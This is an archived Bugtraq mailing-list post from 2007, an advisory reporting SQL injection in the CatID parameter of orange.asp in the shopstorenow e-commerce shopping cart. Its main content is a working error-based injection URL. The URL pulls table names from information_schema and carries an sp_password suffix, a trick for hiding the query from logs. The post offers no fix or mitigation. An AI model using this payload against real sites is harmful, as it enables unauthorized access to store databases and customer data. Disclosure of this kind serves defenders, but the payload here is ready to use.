[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

shopstorenow (orange.asp) sql injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: shopstorenow (orange.asp) sql injection
From: emel_gw_ini@xxxxxxxxx
Date: 6 Jan 2007 17:19:37 -0000

============================= HItamputih Crew ====================
#hitamputih Advisory
##Discovered By : IbnuSina
#-----------------------------------------------------------
#Software: shopstorenow E-commerce Shopping Cart
#Method: SQL Injection
#
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//orange.asp?CatID=[SQL]
================================================
ex:

http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password

#########################################################################################

Prev by Date: Fix & Chips CMS v1.0
Next by Date: FON Router allows anonymous web access
Previous by thread: Fix & Chips CMS v1.0
Next by thread: FON Router allows anonymous web access
Index(es):
- Date
- Thread